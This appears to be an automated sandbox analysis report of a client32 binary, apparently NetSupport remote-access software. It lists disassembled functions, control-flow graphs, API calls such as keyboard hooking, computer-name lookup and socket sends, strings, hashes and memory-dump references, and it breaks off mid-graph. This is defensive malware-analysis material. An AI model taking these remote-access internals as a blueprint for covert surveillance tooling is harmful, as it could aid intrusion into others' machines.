                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                  • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                  • API String ID: 3464732724-3340099623
                                                                                  • Opcode ID: 91cffe1c61f549a3eebd687e18f2deb194647469c240190c43c6c0c2cbc8add3
                                                                                  • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                  • Opcode Fuzzy Hash: 91cffe1c61f549a3eebd687e18f2deb194647469c240190c43c6c0c2cbc8add3
                                                                                  • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50
                                                                                  Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2418 1102e199 2419 1102e1a0-1102e1b1 2418->2419 2419->2419 2420 1102e1b3 2419->2420 2421 1102e2f4-1102e30d call 11143690 2420->2421 2424 1102e313-1102e315 2421->2424 2425 1102e190-1102e193 2421->2425 2428 1102e413-1102e42d call 11146fe0 2424->2428 2429 1102e31b-1102e321 2424->2429 2426 1102e195-1102e197 2425->2426 2427 1102e1b8-1102e1c1 2425->2427 2426->2419 2427->2421 2430 1102e1c7-1102e1ce 2427->2430 2452 1102e483-1102e48f call 1102bc40 2428->2452 2453 1102e42f-1102e448 call 1105e820 2428->2453 2432 1102e323-1102e332 call 11145990 2429->2432 2433 1102e338-1102e348 2429->2433 2430->2421 2436 1102e2c3-1102e2d8 call 11163ca7 2430->2436 2437 1102e1d5-1102e1d7 2430->2437 2438 1102e2da-1102e2ef call 11163ca7 2430->2438 2439 1102e26a-1102e29d call 11162777 call 11142e60 2430->2439 2440 1102e2ab-1102e2c1 call 11164ed0 2430->2440 2441 1102e25b-1102e265 2430->2441 2442 1102e29f-1102e2a9 2430->2442 2443 1102e21c-1102e222 2430->2443 2444 1102e24c-1102e256 2430->2444 2432->2433 2434 1102e34a 2433->2434 2435 1102e34f-1102e36d call 1102d360 2433->2435 2434->2435 2435->2428 2467 1102e373-1102e398 call 110b7df0 call 11147060 2435->2467 2436->2421 2437->2421 2451 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2437->2451 2438->2421 2439->2421 2440->2421 2441->2421 2442->2421 2454 1102e224-1102e238 call 11163ca7 2443->2454 2455 1102e23d-1102e247 2443->2455 2444->2421 2451->2421 2475 1102e491-1102e498 2452->2475 2476 1102e468-1102e46f 2452->2476 2453->2452 2473 1102e44a-1102e45c 2453->2473 2454->2421 2455->2421 2502 1102e3a3-1102e3a9 2467->2502 2503 1102e39a-1102e3a1 2467->2503 2473->2452 2496 1102e45e 2473->2496 2481 1102e475-1102e478 2475->2481 2483 1102e49a-1102e4a4 2475->2483 2476->2481 2482 1102e67a-1102e69b GetComputerNameA 2476->2482 2485 1102e47a-1102e481 call 110b7df0 2481->2485 2486 1102e4a9 2481->2486 2488 1102e6d3-1102e6d9 2482->2488 2489 1102e69d-1102e6d1 call 11028230 2482->2489 2483->2482 2498 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2485->2498 2486->2498 2492 1102e6db-1102e6e0 2488->2492 2493 1102e70f-1102e722 call 11164ed0 2488->2493 2489->2488 2521 1102e727-1102e733 2489->2521 2499 1102e6e6-1102e6ea 2492->2499 2516 1102e917-1102e93a 2493->2516 2496->2476 2553 1102e64a-1102e652 SetLastError 2498->2553 2554 1102e58c-1102e5a3 2498->2554 2506 1102e706-1102e708 2499->2506 2507 1102e6ec-1102e6ee 2499->2507 2509 1102e3ab-1102e3b2 call 11028360 2502->2509 2510 1102e409 2502->2510 2503->2428 2515 1102e70b-1102e70d 2506->2515 2513 1102e702-1102e704 2507->2513 2514 1102e6f0-1102e6f6 2507->2514 2509->2510 2527 1102e3b4-1102e3e6 2509->2527 2510->2428 2513->2515 2514->2506 2520 1102e6f8-1102e700 2514->2520 2515->2493 2515->2521 2530 1102e962-1102e96a 2516->2530 2531 1102e93c-1102e942 2516->2531 2520->2499 2520->2513 2524 1102e735-1102e74a call 110b7df0 call 1102a1f0 2521->2524 2525 1102e74c-1102e75f call 11081d30 2521->2525 2560 1102e7a3-1102e7bc call 11081d30 2524->2560 2546 1102e761-1102e784 2525->2546 2547 1102e786-1102e788 2525->2547 2541 1102e3f0-1102e3ff call 110f64d0 2527->2541 2542 1102e3e8-1102e3ee 2527->2542 2535 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2530->2535 2536 1102e96c-1102e979 call 11036710 call 11162777 2530->2536 2531->2530 2539 1102e944-1102e95d call 1102d900 2531->2539 2536->2535 2539->2530 2551 1102e402-1102e404 call 1102d900 2541->2551 2542->2541 2542->2551 2546->2560 2556 1102e790-1102e7a1 2547->2556 2551->2510 2562 1102e613-1102e61f 2553->2562 2554->2562 2572 1102e5a5-1102e5ae 2554->2572 2556->2556 2556->2560 2581 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2560->2581 2582 1102e8fc-1102e909 call 11164ed0 2560->2582 2566 1102e662-1102e671 2562->2566 2567 1102e621-1102e62d 2562->2567 2566->2482 2575 1102e673-1102e674 FreeLibrary 2566->2575 2573 1102e63f-1102e643 2567->2573 2574 1102e62f-1102e63d GetProcAddress 2567->2574 2572->2562 2580 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2572->2580 2578 1102e654-1102e656 SetLastError 2573->2578 2579 1102e645-1102e648 2573->2579 2574->2573 2575->2482 2585 1102e65c 2578->2585 2579->2585 2580->2562 2603 1102e5e8-1102e60e call 11147060 call 11027f80 2580->2603 2618 1102e853-1102e869 call 11129e00 2581->2618 2619 1102e83f-1102e84e call 11029a70 2581->2619 2594 1102e90c-1102e911 CharUpperA 2582->2594 2585->2566 2594->2516 2603->2562 2623 1102e882-1102e8bc call 110d0e20 * 2 2618->2623 2624 1102e86b-1102e87d call 110d0e20 2618->2624 2619->2618 2631 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 2623->2631 2632 1102e8be-1102e8cd call 11029a70 2623->2632 2624->2623 2631->2594 2632->2631
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: $18/11/16 11:28:14 V12.10F20$648351$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                  • API String ID: 1029625771-2135129619
                                                                                  • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                  • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                  • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                  • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                                  Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2638 11142010-11142051 call 11147060 2641 11142057-111420b3 LoadLibraryA 2638->2641 2642 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2638->2642 2643 111420b5-111420c0 call 11017a40 2641->2643 2644 111420c7-111420d0 2641->2644 2653 11142105-1114210b 2642->2653 2654 11142133 2642->2654 2643->2644 2652 111420c2 call 110ccc90 2643->2652 2644->2642 2647 111420d2-111420d3 FreeLibrary 2644->2647 2647->2642 2652->2644 2653->2654 2656 1114210d-11142113 2653->2656 2657 1114213d-1114215d GetClassInfoExA 2654->2657 2656->2654 2658 11142115-11142131 call 1105e820 2656->2658 2659 11142163-1114218a call 11162be0 call 11145080 2657->2659 2660 111421fe-11142256 2657->2660 2658->2657 2669 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2659->2669 2670 1114218c-111421a0 call 11029a70 2659->2670 2671 11142292-11142298 2660->2671 2672 11142258-1114225e 2660->2672 2669->2660 2696 111421e7-111421fb call 11029a70 2669->2696 2670->2669 2674 111422d4-111422f6 call 1105e820 2671->2674 2675 1114229a-111422a9 call 111101b0 2671->2675 2672->2671 2677 11142260-11142266 2672->2677 2691 11142304-11142309 2674->2691 2692 111422f8-11142302 2674->2692 2689 111422cd 2675->2689 2690 111422ab-111422cb 2675->2690 2677->2671 2679 11142268-1114227f call 1112d770 LoadLibraryA 2677->2679 2679->2671 2695 11142281-1114228d GetProcAddress 2679->2695 2697 111422cf 2689->2697 2690->2697 2693 11142315-1114231b 2691->2693 2694 1114230b 2691->2694 2692->2693 2698 1114231d-11142323 call 110f8230 2693->2698 2699 11142328-11142341 call 1113d9a0 2693->2699 2694->2693 2695->2671 2696->2660 2697->2674 2698->2699 2706 11142347-1114234d 2699->2706 2707 111423e9-111423fa 2699->2707 2708 1114234f-11142361 call 111101b0 2706->2708 2709 11142389-1114238f 2706->2709 2720 11142363-11142379 call 1115e590 2708->2720 2721 1114237b 2708->2721 2710 111423b5-111423c1 2709->2710 2711 11142391-11142397 2709->2711 2715 111423c3-111423c9 2710->2715 2716 111423d8-111423e3 #17 LoadLibraryA 2710->2716 2713 1114239e-111423b0 SetTimer 2711->2713 2714 11142399 call 11135840 2711->2714 2713->2710 2714->2713 2715->2716 2719 111423cb-111423d1 2715->2719 2716->2707 2719->2716 2723 111423d3 call 1112e5e0 2719->2723 2722 1114237d-11142384 2720->2722 2721->2722 2722->2709 2723->2716
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                  • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                  • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                  • _memset.LIBCMT ref: 11142169
                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                  • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                  • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                  • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                  • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                  • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                  • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                  • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                    • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,50D94AA1,11030346,00000000), ref: 11017A6E
                                                                                    • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                    • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                    • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                    • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                    • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                  • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                  • API String ID: 3706574701-3145203681
                                                                                  • Opcode ID: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
                                                                                  • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                  • Opcode Fuzzy Hash: 1988f2ffd7d0be03911037a925b44701ef5e9a8330d7ff99e7a2dda1d6de6d06
                                                                                  • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                                  Function 6F9F63C0 Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 181libraryloadersleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2727 6f9f63c0-6f9f6402 call 6fa14710 EnterCriticalSection InterlockedDecrement 2730 6f9f65ed-6f9f6608 LeaveCriticalSection call 6fa128e1 2727->2730 2731 6f9f6408-6f9f641f EnterCriticalSection 2727->2731 2733 6f9f64da-6f9f64e0 2731->2733 2734 6f9f6425-6f9f6431 2731->2734 2735 6f9f65bd-6f9f65e8 call 6fa11c50 LeaveCriticalSection 2733->2735 2736 6f9f64e6-6f9f64f0 shutdown 2733->2736 2738 6f9f6443-6f9f6447 2734->2738 2739 6f9f6433-6f9f6441 GetProcAddress 2734->2739 2735->2730 2740 6f9f650a-6f9f652d timeGetTime #16 2736->2740 2741 6f9f64f2-6f9f6507 GetLastError call 6f9f30a0 2736->2741 2743 6f9f644e-6f9f6450 SetLastError 2738->2743 2744 6f9f6449-6f9f644c 2738->2744 2739->2738 2747 6f9f652f 2740->2747 2748 6f9f656c-6f9f656e 2740->2748 2741->2740 2745 6f9f6456-6f9f6465 2743->2745 2744->2745 2751 6f9f6477-6f9f647b 2745->2751 2752 6f9f6467-6f9f6475 GetProcAddress 2745->2752 2754 6f9f6551-6f9f656a #16 2747->2754 2755 6f9f6531 2747->2755 2756 6f9f6570-6f9f657b closesocket 2748->2756 2757 6f9f647d-6f9f6480 2751->2757 2758 6f9f6482-6f9f6484 SetLastError 2751->2758 2752->2751 2754->2747 2754->2748 2755->2754 2759 6f9f6533-6f9f653e GetLastError 2755->2759 2760 6f9f657d-6f9f658a WSAGetLastError 2756->2760 2761 6f9f65b6 2756->2761 2762 6f9f648a-6f9f6499 2757->2762 2758->2762 2759->2748 2763 6f9f6540-6f9f6547 timeGetTime 2759->2763 2764 6f9f658c-6f9f658e Sleep 2760->2764 2765 6f9f6594-6f9f6598 2760->2765 2761->2735 2768 6f9f64ab-6f9f64af 2762->2768 2769 6f9f649b-6f9f64a9 GetProcAddress 2762->2769 2763->2748 2770 6f9f6549-6f9f654b Sleep 2763->2770 2764->2765 2765->2756 2766 6f9f659a-6f9f659c 2765->2766 2766->2761 2771 6f9f659e-6f9f65b3 GetLastError call 6f9f30a0 2766->2771 2772 6f9f64c3-6f9f64d5 SetLastError 2768->2772 2773 6f9f64b1-6f9f64be 2768->2773 2769->2768 2770->2754 2771->2761 2772->2735 2773->2735
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6FA3B898,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F63E8
                                                                                  • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6F9F63FA
                                                                                  • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6412
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6F9F643B
                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6450
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6F9F646F
                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6484
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6F9F64A3
                                                                                  • SetLastError.KERNEL32(00000078,?,00000000,?,6F9FD77B,00000000), ref: 6F9F64C5
                                                                                  • shutdown.WSOCK32(?,00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F64E9
                                                                                  • GetLastError.KERNEL32(?,00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F64F2
                                                                                  • timeGetTime.WINMM(?,00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6510
                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6526
                                                                                  • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6533
                                                                                  • timeGetTime.WINMM(?,00000000,?,6F9FD77B,00000000), ref: 6F9F6540
                                                                                  • Sleep.KERNEL32(00000001,?,00000000,?,6F9FD77B,00000000), ref: 6F9F654B
                                                                                  • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6563
                                                                                  • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F6574
                                                                                  • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F657D
                                                                                  • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F658E
                                                                                  • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6F9FD77B,00000000), ref: 6F9F659E
                                                                                  • _memset.LIBCMT ref: 6F9F65C8
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,6F9FD77B,00000000), ref: 6F9F65D7
                                                                                  • LeaveCriticalSection.KERNEL32(6FA3B898,?,00000000,?,6F9FD77B,00000000), ref: 6F9F65F2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                  • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                  • API String ID: 3764039262-2631155478
                                                                                  • Opcode ID: b27a09814b850aecd8f2672e3603a9400b50eb143fa32efd89faf24cafc7cda6
                                                                                  • Instruction ID: ddfc4d94d3366bff88e246e873f5fdb418dacab722b002aae8d9f0365d0e3629
                                                                                  • Opcode Fuzzy Hash: b27a09814b850aecd8f2672e3603a9400b50eb143fa32efd89faf24cafc7cda6
                                                                                  • Instruction Fuzzy Hash: A951B0736047009FDB20EF68CD84B5673B9BF8A328F118114E909E72C4EB75E896CB61
                                                                                  Function 6F9F98D0 Relevance: 45.8, APIs: 15, Strings: 11, Instructions: 346COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 2777 6f9f98d0-6f9f9932 2778 6f9f9956-6f9f995e 2777->2778 2779 6f9f9934-6f9f9955 call 6f9f30a0 call 6fa128e1 2777->2779 2780 6f9f9ac5-6f9f9acc 2778->2780 2781 6f9f9964-6f9f9979 call 6fa128f0 2778->2781 2784 6f9f9ace-6f9f9adb 2780->2784 2785 6f9f9b19-6f9f9b1d 2780->2785 2781->2780 2797 6f9f997f-6f9f9994 call 6fa14330 2781->2797 2789 6f9f9add-6f9f9af6 wsprintfA 2784->2789 2790 6f9f9af8-6f9f9b07 wsprintfA 2784->2790 2791 6f9f9b1f-6f9f9b26 2785->2791 2792 6f9f9b4b-6f9f9b70 GetTickCount InterlockedExchange EnterCriticalSection 2785->2792 2798 6f9f9b0a-6f9f9b16 call 6f9f52b0 2789->2798 2790->2798 2791->2792 2794 6f9f9b28-6f9f9b41 call 6f9f77b0 2791->2794 2795 6f9f9b9c-6f9f9ba1 2792->2795 2796 6f9f9b72-6f9f9b9b LeaveCriticalSection call 6f9f30a0 call 6fa128e1 2792->2796 2794->2792 2812 6f9f9b43-6f9f9b45 2794->2812 2802 6f9f9bfb-6f9f9c05 2795->2802 2803 6f9f9ba3-6f9f9bd0 call 6f9f4dd0 2795->2803 2797->2780 2816 6f9f999a-6f9f99af call 6fa128f0 2797->2816 2798->2785 2806 6f9f9c3b-6f9f9c47 2802->2806 2807 6f9f9c07-6f9f9c17 2802->2807 2825 6f9f9d4b-6f9f9d6c LeaveCriticalSection call 6fa077e0 2803->2825 2826 6f9f9bd6-6f9f9bf6 WSAGetLastError call 6f9f30a0 2803->2826 2815 6f9f9c50-6f9f9c5a 2806->2815 2813 6f9f9c19-6f9f9c1d 2807->2813 2814 6f9f9c20-6f9f9c22 2807->2814 2812->2792 2813->2814 2819 6f9f9c1f 2813->2819 2814->2806 2822 6f9f9c24-6f9f9c36 call 6f9f46c0 2814->2822 2820 6f9f9d2e-6f9f9d3b call 6f9f30a0 2815->2820 2821 6f9f9c60-6f9f9c65 2815->2821 2816->2780 2839 6f9f99b5-6f9f99f1 2816->2839 2819->2814 2845 6f9f9d45 2820->2845 2829 6f9f9c67-6f9f9c6b 2821->2829 2830 6f9f9c71-6f9f9c9a send 2821->2830 2822->2806 2840 6f9f9d6e-6f9f9d72 InterlockedIncrement 2825->2840 2841 6f9f9d78-6f9f9d8a call 6fa128e1 2825->2841 2826->2825 2829->2820 2829->2830 2836 6f9f9c9c-6f9f9c9f 2830->2836 2837 6f9f9cf1-6f9f9d0f call 6f9f30a0 2830->2837 2843 6f9f9cbe-6f9f9cce WSAGetLastError 2836->2843 2844 6f9f9ca1-6f9f9cac 2836->2844 2837->2845 2846 6f9f99f7-6f9f99ff 2839->2846 2840->2841 2847 6f9f9d11-6f9f9d2c call 6f9f30a0 2843->2847 2848 6f9f9cd0-6f9f9ce9 timeGetTime Sleep 2843->2848 2844->2845 2851 6f9f9cb2-6f9f9cbc 2844->2851 2845->2825 2852 6f9f9a05-6f9f9a08 2846->2852 2853 6f9f9aa3-6f9f9ac2 call 6f9f30a0 2846->2853 2847->2845 2848->2815 2857 6f9f9cef 2848->2857 2851->2848 2858 6f9f9a0e 2852->2858 2859 6f9f9a0a-6f9f9a0c 2852->2859 2853->2780 2857->2845 2860 6f9f9a14-6f9f9a1d 2858->2860 2859->2860 2863 6f9f9a1f-6f9f9a22 2860->2863 2864 6f9f9a8d-6f9f9a8e 2860->2864 2865 6f9f9a26-6f9f9a35 2863->2865 2866 6f9f9a24 2863->2866 2864->2853 2867 6f9f9a37-6f9f9a3a 2865->2867 2868 6f9f9a90-6f9f9a93 2865->2868 2866->2865 2870 6f9f9a3e-6f9f9a4d 2867->2870 2871 6f9f9a3c 2867->2871 2869 6f9f9a9d 2868->2869 2869->2853 2872 6f9f9a4f-6f9f9a52 2870->2872 2873 6f9f9a95-6f9f9a98 2870->2873 2871->2870 2874 6f9f9a56-6f9f9a65 2872->2874 2875 6f9f9a54 2872->2875 2873->2869 2876 